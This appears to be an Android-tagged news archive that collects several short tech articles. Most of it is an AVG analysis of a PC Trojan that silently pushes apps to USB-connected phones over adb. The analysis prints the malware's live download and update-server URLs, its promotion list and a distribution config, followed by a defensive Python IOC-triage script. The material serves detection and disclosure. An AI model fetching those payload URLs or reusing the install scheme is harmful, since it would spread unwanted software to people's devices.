Tag Archives: Android

Apple Could Offer iMessage App for Android

Although Apple has its own operating systems for the desktop (Mac OS X) and the iPhone (iOS), the company has long ported some of its in-house applications to other platforms.

Apple debuted on its rival mobile OS platform last year with the launch of Apple Music on Android, while iTunes and Safari have already been made available for Windows as well as Mac.

Now, the company will

Maru OS — Android ROM that Turns into Debian Linux When Connected to a PC

Good news for Linux techno freaks! Do you usually tinker with your Android smartphone, trying out every new app and custom ROM that comes along?

Then this news would be a perfect pick for you!

What if you could effectively carry a Linux computer in your pocket?

Introducing a new Android-based operating system named “Maru OS” that combines the mobility of a

Latest Windows 10 May Have a Linux Subsystem Hidden Inside

A few months back, Microsoft impressed the world with its ‘Microsoft loves Linux‘ announcements, including the development of a custom Linux-based OS to run Azure Cloud Switch and the selection of Ubuntu as the operating system for its cloud-based Big Data services.


Now a well-known Windows hacker and computer expert who goes by the name ‘WalkingCat’ has discovered that the latest version of Windows 10 may have a Linux subsystem quietly installed inside.
According to his tweets, he spotted two mysterious files, LXss.sys and LXCore.sys, in the latest Windows 10 Redstone build, 14251, which are suspected to be part of Microsoft’s Project Astoria.
Project Astoria, also known as Windows Bridge for Android, is a toolkit that allows Android apps to run on Windows 10 Mobile devices.
The naming convention of the newly discovered files is very similar to that of the Android subsystem files from Project Astoria, e.g. ADss.sys.
So the “LX” in these names can only be taken to mean one thing, Linux, which suggests that Windows 10 will also have access to a Linux subsystem.

Why a Linux Subsystem?

Since Windows 10 has been introduced as a universal operating system for all devices, Microsoft may want to expand Project Astoria from mobile devices to desktop users.
If this turns out to be true, a Linux subsystem would be useful should Microsoft plan to support Linux applications, especially server-related technology and software.

Isn’t this exciting?


PC Malware that silently installs apps on your Android device

The AVG VirusLab was recently exploring the Chinese Android app market and encountered PC-based malware with an interesting side-effect: it silently (without any notification to the user) installed apps onto Android devices connected to the PC.

With a competitive landscape of over 1.9 million Android apps in the Google Play store alone, and more in other marketplaces, it’s not hard to see why such tactics appeal to developers. Advertising a new app has become increasingly difficult and costly.

Pre-installation of apps, for example, is one of the most successful ways for developers to gain attention and market share, yet it is prohibitively expensive and relies on partnerships with a limited number of handset vendors.

China’s underground black market, however, appears to offer developers a cheaper pre-installation alternative for spreading their new apps: special “alliance” operations such as the ones we identified called “cyber café alliance” and “fast step union”.

These alliances offer access to a combination of resources such as hackers, distributors, cyber cafés, phishing websites and servers. They are organized and operated systematically and focus on providing a sales and distribution service.

What we captured and describe below is typical of such “promoting” Trojans: malware designed to assist in the promotion or distribution of software or apps through questionable methods.

This particular malware starts by being downloaded to the computer, but its main purpose has little to do with the PC itself. Using some clever techniques, it will even “help” you install mobile device drivers if you haven’t already.

From then on, whenever you connect your mobile device to the infected PC, the malware downloads an “App promotion list” and installs those apps silently onto your device. Note that this only works against a device that has USB debugging enabled and, on Android 4.2.2 and later, has authorized the PC’s adb key; a phone that has never been put into developer mode is not reachable this way.

Download the device’s driver from the server:

The server’s response:

{ "platform":"android", "service":"winusb", "args":"", "dl":"http://222.186.60.89:1001/driver/Android/Google/Google64.zip", "md5":"", "size":"" }

Download Adb and other components:

Download the App list:

Below is an example list:

{ "list" : [{
    "dl" : "http://222.186.60.128:1501/522/TTAPKYH_ZX_AG_595_20150826_2.0.0.2.a",
    "pn" : "org.funcity.runrunner.yh.zx",
    "md5" : "9441ce1595fa1d9a4577263d2c30307a"
},
{
    "dl" : "http://222.186.60.128:1501/522/MHLS_AG_906_20151109_1.0.0.1.a",
    "pn" : "com.ltestany.catmouse",
    "md5" : "21b4ba7356f93c4e206455c42a2fc275"
},
{
    "dl" : "http://222.186.60.128:1501/512/BDMSN_ch_white308.a",
    "pn" : "com.tunimei.p8.bai.bdmsn42",
    "md5" : "f732fa12b1754caaf70822fb3dc81dfb"
},
{
    "dl" : "http://222.186.60.128:1501/522/BYDR3JJB_AG_375_20150907_1.0.0.9.a",
    "pn" : "com.you2game.fish.qy.zx1",
    "md5" : "73411890e59a099606122e39fe01c0dc"
},
{
    "dl" : "http://222.186.60.128:1501/512/qqbrowser_6.1.2.1715_22411.a",
    "pn" : "com.tencent.mtt",
    "md5" : "0d8cd219f36e445ef483cf42da5aaca4"
},
{
    "dl" : "http://222.186.60.128:1501/522/com.qihoo.gameunion_41611.a",
    "pn" : "com.qihoo.gameunion",
    "md5" : "dfe5a616507560a49c16831d12b882a0"
},
{
    "dl" : "http://222.186.60.128:1501/522/CFQMJS_AG_610_20150811_1.0.0.3.a",
    "pn" : "com.aiwan.sniper212.zxcps.zx1",
    "md5" : "8446863713d13cb047029f867167f785"
},
{
    "dl" : "http://222.186.60.128:1501/512/Sogou_Explorer_1493.a",
    "pn" : "sogou.mobile.explorer",
    "md5" : "63e3b5c44796ac43fd3eb99d568c6525"
},
{
    "dl" : "http://222.186.60.21:1501/522/xiuba-3.3.0-3262-1-TEST1.a",
    "pn" : "com.xiu8.android.activity",
    "md5" : "721a40131f83bee2874904fb332c8de5"
}]}

Use adb.exe to install the apps:

All of the apps in the snapshot below were installed by this malware.

We have noted that this malware is regularly updated. At the time of our research the latest version was 1.7, and the malware checks with a remote server for the newest version each time it runs.

Query the server to check the version:

http://222.186.60.89:9023/?action=getVersion&pcid=6C78A9C3_%3CMACHINE_NAME%3E&nowVer=1.1&pid=109&subpid=&runas=exe

And the server responded with:

{ "renew" : "0", "version" : "1.7", "dl" : "http://222.186.60.128:1123/setup/appmain.v1.7.exe" }

We found that this malware has been actively developed and improved for some time; below is a record of some of the versions we have observed. It is possible that this malware is developed and maintained by a stable team.

But how does this malware get onto end users’ computers in the first place? The answer is the alliance model mentioned above.

In our research, we looked at two cyber café alliances, named in Chinese ‘领跑吧网吧联盟 (Leading runner cyber café alliance)’ and ‘快步网盟 (Fast step net union)’, and captured some of their distribution servers and their clients’ apps:

[File]
kuaibu8=http://4IG7UpAH.adkuai8.com:7000/iniuser/
szicoad=http://4IG7UpAH.adkuai8.com:7000/ico/
wbzzlm=http://4IG7UpAH.adkuai8.com:7000/wbzzlm/

[update]
Startupdate=yes
kuaibu8=kuaibu8
szicoad=szicoad
wbzzlm=wbzzlm

[server]
01=down01.kuaibu8.com:5505
02=down01.kuaibu8.com:5505
03=down01.kuaibu8.com:5505
04=down01.kuaibu8.com:5505
05=down01.kuaibu8.com:5505
06=down01.kuaibu8.com:5505
07=down01.kuaibu8.com:5505
08=down01.kuaibu8.com:5505
09=down01.kuaibu8.com:5505
10=down01.kuaibu8.com:5505

[dllhost]
yewu01=/updata/adclient/ie/ieadd.dll
yewu02=/updata/adclient/cpu/cpuvod.dll
yewu05=/updata/adclient/desk/tequangame.exe
yewu06=/updata/adclient/desk/desk1.exe
yewu09=/updata/adclient/pcfen/app.dll
yewu10=/updata/adclient/sohu/adpc.exe
yewu98=/updata/adclient/baidu/baidu.dll
yewu100=/updata/adclient/online/ipdong.dll
yewu101=/updata/adclient/online/letvst.exe

[yewu01]
zhuyeid=/updata/adclient/baidu/baidu.dll
daohang=/updata/adclient/baidu/baidu.dll

[MD5]
pc.dll=19F7823A7CFE41AC7391BA1C8C402D4B
ieadd.dll=B72A680F93B3EE939FD5ED7818BB28FB
cpuvod.dll=C98A50E044DE1BC9E3E0ED3B7B334231
baidu.dll=37E8DBBF71D48CE87B6D21362A4E2E69
tequangame.exe=A36BCA657DA769E928FC1F746759E66F
desk1.exe=6438B7830D7B110CDF2CDF017AC6EF69
app.dll=5E782960BB0EABB41E756E58381CB5DA
adpc.exe=ED596AB4CABE52680A97073C29BCAC6D
ipdong.dll=5C6F0FEE74493D76F6EBA01BBC741190
2345ieadd.exe=93E32D9C0D647EC2DA4E456398905947
ieadd360.dll=136E8CA0987C754EEBFBCC7164307E78
letvst.exe=6283F091AE24944D487A67FC0C92DD46
wyvip.exe=689DBD3CED0D2A1404DD5ED1E6B06EB6
bdbrowserSetup-7.6.504.2877-1811_10003289.exe=095D58F8A54AC364836A7BA4AA802D25
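The two artifacts reproduced above, the JSON “App promotion list” the PC component fetches and the INI the alliance distribution network serves, are what an analyst actually has to work with. The script below is an added example (not AVG’s code, and not the malware’s) showing how to turn both into a single set of indicators and then check a connected phone against the promotion list. The JSON and INI samples are constructed, trimmed copies in the same schema as the captures above; the `pm list packages -3` output is invented to stand in for a real device.

```python
"""IOC triage for the captured "App promotion list" (JSON) and the alliance
config (INI).  Added example, not AVG's code or the malware's.  The samples
are constructed copies trimmed from the write-up; PM_LIST_OUTPUT is invented."""
import configparser
import json
import re
from urllib.parse import urlsplit

MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed: three entries in the schema shown above (dl / pn / md5).
PROMO_LIST = """{ "list" : [
 {"dl": "http://222.186.60.128:1501/522/TTAPKYH_ZX_AG_595_20150826_2.0.0.2.a",
  "pn": "org.funcity.runrunner.yh.zx", "md5": "9441ce1595fa1d9a4577263d2c30307a"},
 {"dl": "http://222.186.60.128:1501/512/qqbrowser_6.1.2.1715_22411.a",
  "pn": "com.tencent.mtt", "md5": "0d8cd219f36e445ef483cf42da5aaca4"},
 {"dl": "http://222.186.60.21:1501/522/xiuba-3.3.0-3262-1-TEST1.a",
  "pn": "com.xiu8.android.activity", "md5": ""}
]}"""

# Constructed: trimmed copy of the alliance INI, same section layout as above.
ALLIANCE_INI = """[File]
kuaibu8=http://4IG7UpAH.adkuai8.com:7000/iniuser/

[server]
01=down01.kuaibu8.com:5505
02=down01.kuaibu8.com:5505

[MD5]
pc.dll=19F7823A7CFE41AC7391BA1C8C402D4B
ieadd.dll=B72A680F93B3EE939FD5ED7818BB28FB
"""

# Constructed: what `adb shell pm list packages -3` might print on a hit device.
PM_LIST_OUTPUT = """package:com.example.mybank
package:com.tencent.mtt
package:org.funcity.runrunner.yh.zx
"""


def parse_promo_list(text):
    """Parse the promotion list, dropping entries with a bad URL or a
    missing/malformed md5 (the driver response above shipped md5 "")."""
    entries = []
    for item in json.loads(text).get("list", []):
        url = urlsplit(item.get("dl", ""))
        md5 = item.get("md5", "").lower()
        if url.scheme not in ("http", "https") or not url.hostname:
            continue
        if not MD5_RE.match(md5):
            continue
        entries.append({"netloc": url.netloc, "path": url.path,
                        "package": item.get("pn", ""), "md5": md5})
    return entries


def parse_alliance_ini(text):
    """Pull download hosts and component hashes out of the alliance INI."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case so file names like pc.dll survive
    cp.read_string(text)
    hosts = set(cp["server"].values()) if cp.has_section("server") else set()
    if cp.has_section("File"):
        hosts |= {urlsplit(u).netloc for u in cp["File"].values()}
    md5s = {}
    if cp.has_section("MD5"):
        md5s = {k: v.lower() for k, v in cp["MD5"].items()
                if MD5_RE.match(v.lower())}
    return {"hosts": sorted(hosts), "md5": md5s}


def extract_iocs(promo_entries, ini):
    """Merge both artifacts into the IOC types a defender blocks or hunts on."""
    return {
        "hosts": sorted({e["netloc"] for e in promo_entries} | set(ini["hosts"])),
        "packages": sorted({e["package"] for e in promo_entries}),
        "md5": sorted({e["md5"] for e in promo_entries} | set(ini["md5"].values())),
    }


def flag_installed(pm_output, promo_entries):
    """Third-party packages on the device that appear on the promotion list."""
    installed = {line.split(":", 1)[1].strip()
                 for line in pm_output.splitlines() if line.startswith("package:")}
    return sorted(installed & {e["package"] for e in promo_entries})


if __name__ == "__main__":
    ents = parse_promo_list(PROMO_LIST)
    print(json.dumps(extract_iocs(ents, parse_alliance_ini(ALLIANCE_INI)), indent=2))
    print("pushed by the malware:", flag_installed(PM_LIST_OUTPUT, ents))
```

A match from `flag_installed` is a lead, not a verdict: several of the promoted packages (QQ Browser, Sogou Explorer) are legitimate apps a user might have installed on purpose. To confirm, compare against `adb shell pm list packages -i`, which reports the installing package; apps sideloaded over adb show no installer. The host and hash sets are what go into proxy blocklists and endpoint sweeps, and the MD5 field is kept only because that is what the malware’s own manifest carries; it is an integrity check for the operator, not a security control.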

To help protect you from this type of malware, AVG already detects it as “Agent5.ZKR”, just one of the many threats we continue to protect you against on all your devices.

Android has some critical remotely-exploitable security holes. But can you get the patch?

Remote code execution vulnerabilities have been found in the Android operating system, and patches released for Nexus devices.

But what about your smartphone? Is there a patch for you, and can you get your hands on it?

The post Android has some critical remotely-exploitable security holes. But can you get the patch? appeared first on We Live Security.

Google Patches Critical Remotely-exploitable Flaws in Latest Android Update

Google has released the February security update for Android, which patches multiple security vulnerabilities in the Android operating system.
In total, five “critical” vulnerabilities were fixed in the release, along with four of “high” severity and one rated merely “moderate”.

Remote Code Execution Flaw in WiFi

Two critical vulnerabilities have been found in the Broadcom Wi-Fi driver that could be exploited to achieve remote code execution (RCE) on affected Android devices when the attacker is on the same network as the victim.
The vulnerabilities (CVE-2016-0801 and CVE-2016-0802) can be exploited by sending specially crafted wireless control message packets that corrupt kernel memory, potentially leading to remote code execution at the kernel level.

“These vulnerabilities can be triggered when the attacker and the victim are associated with the same network,” reads the advisory. “This issue is rated as a Critical severity due to the possibility of remote code execution in the context of the kernel without requiring user interaction.”

Remote Code Execution Flaw in Mediaserver

Another two critical vulnerabilities were found in Mediaserver, the component targeted last summer by the critical Stagefright vulnerabilities, which let anyone compromise an Android device by sending a specially crafted MMS message.
The newly patched Mediaserver flaws (CVE-2016-0803 and CVE-2016-0804) could enable remote code execution on affected devices when a crafted media file is processed, whether it arrives by email, web browsing or MMS.
A separate elevation of privilege vulnerability in Mediaserver (CVE-2016-0810) could be exploited to gain elevated capabilities, including Signature or SignatureOrSystem permissions, that are not available to third-party apps.
Two elevation of privilege vulnerabilities were also found in Qualcomm components: the Qualcomm Performance Module (CVE-2016-0805) and the Qualcomm Wi-Fi driver (CVE-2016-0806). Both are rated critical, since they could let an attacker launch further attacks.
Another critically rated bug (CVE-2016-0807) in the Debuggerd component could allow execution of arbitrary code with root privileges. Debuggerd is the tool Android uses to debug and analyze crashes.

Other high severity bugs include:

  • An elevation of privilege vulnerability in the Android Wi-Fi component
  • A denial-of-service vulnerability in the Minikin library
  • An information disclosure bug in libmediaplayerservice
The remaining issue, the one rated moderate, is an elevation of privilege flaw in Setup Wizard that could allow an attacker with physical access to bypass Factory Reset Protection and gain access to the device.
All the security patches are currently available for Nexus devices only. Google shared the patches with carrier and manufacturer partners on January 4, but users of other Android devices will have to wait until their manufacturers ship an update.
Nexus users can patch immediately by flashing the new build, or wait for the OTA (over-the-air) update, which should roll out in the next week or so.

Hacking Smartphones Running on MediaTek Processors

A dangerous backdoor has been discovered in MediaTek processors that could be exploited to hack Android devices remotely.

MediaTek is a Taiwan-based company that manufactures chips and processors used in smartphones and tablets.

The backdoor was discovered by security researcher Justin Case, who already informed MediaTek about the security issue via Twitter, as

Samsung Get Sued for Failing to Update its Smartphones

One of the world’s largest smartphone makers is being sued by the Dutch Consumers’ Association (DCA) for failing to provide timely software updates for its Android smartphones.

This doesn’t surprise me, though.

Most manufacturers fail to deliver software updates for older devices for years.

However, the consumer protection watchdog in The Netherlands, The Dutch